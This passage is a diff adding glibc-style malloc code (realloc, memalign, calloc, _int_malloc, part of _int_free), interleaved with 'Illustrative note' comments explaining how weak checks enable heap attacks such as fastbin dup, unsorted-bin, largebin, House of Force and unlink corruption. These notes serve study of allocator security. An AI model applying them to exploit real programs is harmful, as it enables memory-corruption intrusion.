+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  (void) mutex_unlock (&ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    (void) mutex_unlock (&av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
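+
+/* Illustrative sketch (assuming a 64-bit build where INTERNAL_SIZE_T is 8
+   bytes, so HALF_INTERNAL_SIZE_T is 1UL << 32): the overflow test in
+   __libc_calloc only pays for a division when one of the operands has a bit
+   at or above position 32, because two factors below 2^32 cannot overflow a
+   64-bit product.  The logic reduces to the stand-alone check below.  */
+#if 0   /* example only, never compiled */
+static int
+example_calloc_overflows (size_t n, size_t elem_size)
+{
+  size_t bytes = n * elem_size;   /* size_t wrap-around is well defined */
+  if ((n | elem_size) >= ((size_t) 1 << (8 * sizeof (size_t) / 2)))
+    return elem_size != 0 && bytes / elem_size != n;
+  return 0;                       /* both factors are small: no overflow */
+}
+#endif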
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
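+
+  /* Illustrative note (64-bit): fastbin_index only looks at the chunk size
+     shifted right by 4, so the "memory corruption (fast)" check above
+     accepts any size field in the same 0x10 bucket.  For nb == 0x70 the
+     index is 5, and a fake chunk whose raw size field reads 0x7f (flag bits
+     included) still indexes to 5 and passes.  This looseness is what
+     fastbin-dup style attacks on the hooks rely on with this allocator.  */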
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+              if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (victim->size > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
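+
+          /* Illustrative note: the two stores above are a partial unlink
+             with no back-link verification at this point, so if victim->bk
+             has been corrupted to point 0x10 bytes before an arbitrary
+             target, the second store writes the address of the unsorted-bin
+             list head (inside the arena) into that target.  This is the
+             classic unsorted-bin-attack write primitive for allocators of
+             this vintage.  */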
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
+                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                      while ((unsigned long) size < fwd->size)
+                        {
+                          fwd = fwd->fd_nextsize;
+                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                        }
+
+                      if ((unsigned long) size == (unsigned long) fwd->size)
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
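+
+          /* Illustrative note: in the smaller-than-smallest branch above,
+             victim->bk_nextsize is taken from the bin's largest chunk and
+             then dereferenced for the store
+             victim->bk_nextsize->fd_nextsize = victim without any check, so
+             a corrupted bk_nextsize on that binned chunk turns this
+             insertion into a write of a heap address to an arbitrary
+             location, the core of the largebin attack on this vintage of
+             the allocator.  */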
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin &&
+              (unsigned long) (victim->size) >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin) && victim->size == victim->fd->size)
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
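+
+      /* Illustrative note: nothing above validates the size field of
+         av->top itself, so if it has been overwritten with a very large
+         value such as (size_t) -1, the comparison always succeeds and a
+         suitably huge request can move the new top pointer to an
+         attacker-chosen address.  That is the premise of the House of Force
+         technique; later glibc releases add an explicit top-size sanity
+         check here.  */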
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        (void) mutex_unlock (&av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have led to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  mutex_lock(&av->mutex);
+		  locked = 1;
+		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    (void)mutex_unlock(&av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
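+
+  /* Illustrative note: the only double-free detection on this path is the
+     "fasttop" comparison above, which checks the chunk against the current
+     head of its fastbin.  Freeing A, then B, then A again therefore passes,
+     because A is no longer the bin head when it is freed the second time;
+     this is the textbook fastbin-dup sequence for this allocator.  */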
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      (void)mutex_lock(&av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = p->prev_size;
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
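+
+    /* Illustrative note: the backward merge above trusts p->prev_size and
+       the PREV_INUSE bit taken from p's own header.  With a forged
+       prev_size and a cleared PREV_INUSE bit, the chunk handed to unlink
+       can be a fake chunk built inside user-controlled data, which is the
+       starting point of unlink-based corruption techniques against this
+       allocator.  */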
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
